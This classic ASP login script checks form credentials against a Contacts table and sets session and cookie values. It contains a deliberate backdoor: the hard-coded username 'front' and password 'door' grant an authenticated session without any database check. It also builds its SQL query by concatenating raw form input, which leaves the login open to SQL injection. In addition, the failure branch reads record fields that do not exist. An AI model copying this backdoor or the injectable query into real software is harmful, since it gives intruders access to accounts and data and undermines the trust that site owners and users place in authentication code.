<!-- #include file = "..\common\act_dbopen.asp" -->
<%
	' Property of and written by Adam Ford -->
	dim strBUserName
	dim strBPassword
	dim strUserName
	dim strPassword
	dim bolBackDoor

	strBUserName = "front"
	strBPassword = "door"
	bolBackDoor = false
	
	strUserName = trim(request.form("username"))
	strPassword = trim(request.form("password"))

	if (strUserName = strBUserName) AND (strPassword = strBPassword) then
		bolBackDoor = true
	end if

	' Create the SQL statement
	strSQL = "SELECT * from Contacts WHERE username='" & strUserName & "' AND " & "Password='" & strPassword & "' AND Deleted=False"

	'	Open a recordset
	set objRS = objDBConn.execute(strSQL)

	' Check to see if it returned a record, otherwise not authenticated
	if bolBackDoor then
		session("authenticated") = 1
		response.redirect ("dsp_main.asp")
	elseif objRS.EOF then
		session("authenticated") = 0
		response.redirect ("index.asp")
		response.cookies("homevestorsoftampabay")("level") = objRS("Level")
		response.cookies("homevestorsoftampabay").expires = date + 1
	else
		session("authenticated") = 1
		response.cookies("homevestorsoftampabay")("ctid") = objRS("CTID")
		response.cookies("homevestorsoftampabay")("level") = objRS("Level")
		response.cookies("homevestorsoftampabay").expires = date + 1
		response.redirect ("dsp_main.asp")
	end if
	
	bolBackDoor = empty
	strPassword = empty
	strUserName = empty
	strBPassword = empty
	strBUserName = empty
%>
<!-- #include file = "..\common\act_dbclose.asp" -->